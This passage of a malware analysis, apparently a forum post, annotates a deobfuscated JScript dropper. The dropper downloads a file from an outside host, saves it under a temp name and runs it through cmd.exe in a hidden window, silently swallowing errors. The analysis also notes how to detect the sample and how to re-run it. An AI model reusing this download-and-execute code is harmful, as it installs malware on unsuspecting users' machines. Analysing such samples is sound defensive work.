var obj_Http = new ActiveXObject("MSXML2.XMLHTTP");
var obj_FileSystemObject = new ActiveXObject("Scripting.FileSystemObject");

var obj_Stream = new ActiveXObject("ADODB.Stream");
obj_Stream.Open();
obj_Stream.Type = 1; => binary

obj_Http.Open("GET", url, 0); => synchronous GET of "http ://ekoosad.top/admin.php?f=400"
obj_Http.send(); => request done !

var path = obj_FileSystemObject.GetSpecialFolder(2) + "\\" + obj_FileSystemObject.GetTempName();

var execute = "cmd.exe /c " + path;

obj_Stream.Position = 0;

var obj_shell = new ActiveXObject("WScript.Shell");

if (obj_Http.Status == 200) {
obj_Stream.Write(obj_Http.ResponseBody);
obj_Stream.SaveToFile(path);
obj_Stream.Close();
obj_shell.run(execute, 0); => window style 0: hidden
}

} catch (exception) {} => every failure (no network, ActiveX unavailable, ...) is swallowed

4) Explanation :

A file is downloaded from http ://ekoosad.top/admin.php?f=400 (only if the server answers HTTP 200), saved to %temp%\RandomName (example: %temp%\radBACD3.tmp, the name comes from GetTempName) and then executed with cmd.exe /c in a hidden window (window style 0).
Two details worth keeping in mind for detection and for re-running the sample: the whole dropper is wrapped in try { ... } catch (e) {}, so any failure is silent; and the ActiveXObject reference is only created when the script is started without named arguments, so launching it with a /name:value argument makes it exit without doing anything.

See here for more details
https://malwaretips.com/threads/quick-analysis-of-obfuscated-wanda-js-js-locky-m3-eldorado.62394/
 